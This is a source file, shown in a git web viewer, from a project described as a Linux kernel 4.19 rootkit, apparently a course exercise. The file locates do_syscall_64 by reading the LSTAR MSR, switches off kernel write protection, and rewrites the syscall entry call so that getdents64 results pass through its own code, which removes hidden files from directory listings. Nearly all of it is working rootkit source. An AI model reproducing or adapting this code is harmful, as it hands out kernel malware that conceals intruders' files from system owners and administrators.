linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs

filehide_lstar.c (8222B)


      1 #include <linux/kernel.h>
      2 #include <linux/string.h>
      3 #include <linux/slab.h>
      4 #include <linux/fdtable.h>
      5 #include <linux/dcache.h>
      6 #include <linux/delay.h>
      7 #include <linux/irqflags.h>
      8 #include <asm/nospec-branch.h>
      9 #include <asm/msr-index.h>
     10 
     11 #include "filehide_lstar.h"
     12 #include "filehide.h"
     13 #include "pidhide.h"
     14 #include "openhide.h"
     15 #include "common.h"
     16 #include "rootkit.h"
     17 #include "hook.h"
     18 
     19 #define SEARCHLEN  512
     20 
     21 atomic_t syscall64_count;
     22 
     23 extern rootkit_t rootkit;
     24 
     25 //Idea: build path from entry_SYSCALL_64_trampoline to do_syscall64 by gathering addresses piece by piece
     26 //(1) JMP_NOSPEC %rdi -> (2) [entry_SYSCALL_64_stage2] jmp entry_SYSCALL_64_after_hwframe -> (3) [entry_SYSCALL_64] call do_syscall_64
     27 //                                     ||                                                 ||=====>
     28 //                               can be skipped ==========================================//
     29 
     30 //sign-extended (0x48 REX.W) mov rdi, imm
     31 static const char *movSignExtended = "\x48\xc7\xc7";
     32 
     33 //The first call in entry_SYSCALL_64 is the right one, so grabbing it is easy
     34 static const char *callNearRelative = "\xE8";
     35 
     36 static void hexdump(char *, int);
     37 static unsigned long read_msr(unsigned int);
     38 static inline unsigned long mem_offset(char *ptr);
     39 static char *find_do_syscall_64(char *lstar_addr);
     40 
     41 void g7_syscall_64(unsigned long, struct pt_regs *);
     42 void (*do_syscall_64)(unsigned long, struct pt_regs *);
     43 void check_getdents64(void);
     44 static char *syscall_64_ptr;
     45 static unsigned long old_off;
     46 
     47 void
     48 hide_files_lstar(void)
     49 {
     50     if (atomic_read(&syscall64_install_count) == 0) {
     51         atomic_inc(&syscall64_install_count);
     52         atomic_set(&syscall64_count, 0);
     53         syscall_64_ptr = find_do_syscall_64((char *)read_msr(MSR_LSTAR));
     54 
     55         if(!do_syscall_64 || !syscall_64_ptr) {
     56             DEBUG_INFO("Couldn't find do_syscall64!\n");
     57             return;
     58         }
     59 
     60         //Calculate new call offset to our function
     61         //newOff = g7_syscall_64_addr - nextOpcodeAddr
     62         unsigned long new_off = (unsigned long)check_getdents64 - ((unsigned long)syscall_64_ptr + 5);
     63 
     64         disable_protection();
     65         memcpy((void *)check_getdents64, "\x90\x90\x90\x90\x90", 5);
     66         memcpy((syscall_64_ptr + 1), &new_off, 4);
     67         enable_protection();
     68 
     69         hexdump((char *)check_getdents64, 32);
     70     }
     71 }
     72 
     73 void
     74 unhide_files_lstar(void)
     75 {
     76     if (atomic_read(&syscall64_install_count) == 1) {
     77         atomic_dec(&syscall64_install_count);
     78         disable_protection();
     79         memcpy((syscall_64_ptr + 1), &old_off, 4);
     80         enable_protection();
     81 
     82         if ((atomic_read(&syscall64_count)) > 0)
     83             msleep(1000);
     84     }
     85 }
     86 
     87 //Only use with multiples of 16..
     88 //Best friend for this exercise, alongside https://defuse.ca/online-x86-assembler.htm
     89 static void
     90 hexdump(char *addr, int n)
     91 {
     92     int k = 0;
     93 
     94     DEBUG_INFO("Hexdump:\n");
     95     while(k < n) {
     96         DEBUG_INFO("%02hhX %02hhX %02hhX %02hhX %02hhX %02hhX %02hhX %02hhX %02hhX %02hhX %02hhX %02hhX %02hhX %02hhX %02hhX %02hhX",
     97                 addr[k], addr[k + 1], addr[k + 2], addr[k + 3], addr[k + 4], addr[k + 5], addr[k + 6], addr[k + 7], addr[k + 8], addr[k + 9],
     98                 addr[k + 10], addr[k + 11], addr[k + 12], addr[k + 13], addr[k + 14], addr[k + 15]);
     99         k += 16;
    100     }
    101 }
    102 
    103 static inline long
    104 sign_extend(int n)
    105 {
    106     if(n & (1 << 31))
    107         return n |= 0xFFFFFFFF00000000;
    108 
    109     return n;
    110 }
    111 
    112 //Get sign-extended 4 byte offset from memory
    113 static inline unsigned long
    114 mem_offset(char *ptr)
    115 {
    116     unsigned long ret = 0;
    117 
    118     memcpy(&ret, ptr, 4);
    119     return sign_extend(ret);
    120 }
    121 
    122 //Finds do_syscall_64, sets it, and returns the pointer to the original call
    123 static char *
    124 find_do_syscall_64(char *lstar_addr)
    125 {
    126     //Step 1: get address of stage 2 trampoline
    127     //If lstar_addr points to entry_SYSCALL_64 directly, skip this part (the case on rkcheck VM)
    128     unsigned long next_addr;
    129 
    130     char *stage2_ptr = strnstr(lstar_addr, movSignExtended, SEARCHLEN);
    131 
    132     if(!stage2_ptr)
    133         //we are probably at entry_SYSCALL_64
    134         next_addr = (unsigned long)lstar_addr;
    135     else
    136         next_addr = mem_offset(stage2_ptr + 3); //3 bytes offset to skip opcode
    137 
    138     //Step 2: conveniently, no 'pointer' chasing is necessary, we can just look for the jump opcode from here
    139     char *syscall64_call_ptr = strnstr((char *)next_addr, callNearRelative, SEARCHLEN);
    140 
    141     if(!syscall64_call_ptr)
    142         return NULL;
    143 
    144     //Get offset from memory
    145     unsigned long syscall64_off = old_off = mem_offset(syscall64_call_ptr + 1); //1 byte offset to skip call opcode
    146 
    147     //Store correct address of do_syscall_64
    148     //Offset relative to _next_ instruction -> e8 xx xx xx xx -> 5 bytes
    149     do_syscall_64 = ((void *)syscall64_call_ptr + 5) + syscall64_off;
    150 
    151     return syscall64_call_ptr;
    152 }
    153 
    154 //To avoid issues when unloading, check first for getdents64
    155 //Defer other syscalls to avoid increasing our atomic count
    156 //We use a jump to avoid building a new stack frame with call
    157 //GCC generates a call instruction at the beginning here that we overwrite with NOPs..
    158 //see also objdump -d -M intel g7.ko | grep -A 3 check_getdents64
    159 void
    160 check_getdents64(void)
    161 {
    162     __asm__ volatile (
    163         "\tcmp $217, %%rdi\n"
    164         "\tje g7_syscall_64\n"
    165         "\tjmp *%0\n"
    166         :: "r"(do_syscall_64)
    167     );
    168 }
    169 
    170 void
    171 g7_syscall_64(unsigned long nr, struct pt_regs *pt_regs)
    172 {
    173     atomic_inc(&syscall64_count);
    174     do_syscall_64(nr, pt_regs);
    175 
    176     //
    177     //  ( ͡°Ĺ̯ ͡° )
    178     //
    179     //https://elixir.bootlin.com/linux/v4.19.163/source/fs/buffer.c#L1218
    180     local_irq_enable();
    181 
    182     typedef struct linux_dirent64 *dirent64_t_ptr;
    183 
    184     unsigned long offset;
    185     dirent64_t_ptr kdirent, cur_kdirent, prev_kdirent;
    186     struct dentry *kdirent_dentry;
    187 
    188     cur_kdirent = prev_kdirent = NULL;
    189     int fd = (int)pt_regs->di;
    190     dirent64_t_ptr dirent = (dirent64_t_ptr)pt_regs->si;
    191     long ret = (long)regs_return_value(pt_regs);
    192 
    193     if (ret <= 0 || !(kdirent = (dirent64_t_ptr)kzalloc(ret, GFP_KERNEL)))
    194         return;
    195 
    196     if (copy_from_user(kdirent, dirent, ret))
    197         goto yield;
    198 
    199     kdirent_dentry = current->files->fdt->fd[fd]->f_path.dentry;
    200 
    201     inode_list_t hidden_inodes = { 0, NULL };
    202     inode_list_t_ptr hi_head, hi_tail;
    203     hi_head = hi_tail = &hidden_inodes;
    204 
    205     struct list_head *i;
    206     list_for_each(i, &kdirent_dentry->d_subdirs) {
    207         unsigned long inode;
    208         struct dentry *child = list_entry(i, struct dentry, d_child);
    209 
    210         if ((inode = must_hide_inode(child)))
    211             hi_tail = add_inode_to_list(hi_tail, inode);
    212     }
    213 
    214     for (offset = 0; offset < ret;) {
    215         cur_kdirent = (dirent64_t_ptr)((char *)kdirent + offset);
    216 
    217         if (list_contains_inode(hi_head, cur_kdirent->d_ino)) {
    218             if (cur_kdirent == kdirent) {
    219                 ret -= cur_kdirent->d_reclen;
    220                 memmove(cur_kdirent, (char *)cur_kdirent + cur_kdirent->d_reclen, ret);
    221                 continue;
    222             }
    223 
    224             prev_kdirent->d_reclen += cur_kdirent->d_reclen;
    225         } else
    226             prev_kdirent = cur_kdirent;
    227 
    228         offset += cur_kdirent->d_reclen;
    229     }
    230 
    231     copy_to_user(dirent, kdirent, ret);
    232 
    233 yield:
    234     kfree(kdirent);
    235 
    236     atomic_dec(&syscall64_count);
    237     local_irq_disable();
    238 }
    239 
    240 static unsigned long
    241 read_msr(unsigned int msr)
    242 {
    243     unsigned int low, high;
    244 
    245     __asm__ volatile (
    246                     "movl %[msr], %%ecx\n\t"
    247                     "rdmsr\n\t"
    248                     "mov %%eax, %[low]\n\t"
    249                     "mov %%edx, %[high]"
    250                     : [low] "=r" (low), [high] "=r" (high)
    251                     : [msr] "r" (msr)
    252                     : "ecx", "eax", "edx"
    253     );
    254 
    255     //Get two 32bit values into a 64bit variable
    256     unsigned long ret = high;
    257     ret <<= 32;
    258     ret |= low;
    259 
    260     return ret;
    261 }
    262 
    263 // static void
    264 // write_msr(unsigned int low, unsigned int high, unsigned int msr)
    265 // {
    266 //     __asm__ volatile (
    267 //                     "movl $0xc0000082, %%ecx\n\t"
    268 //                     "mov %[low], %%eax\n\t"
    269 //                     "mov %[high], %%edx\n\t"
    270 //                     "wrmsr"
    271 //                     :
    272 //                     : [low] "r" (low), [high] "r" (high)
    273 //                     : "ecx", "eax", "edx"
    274 //     );
    275 // }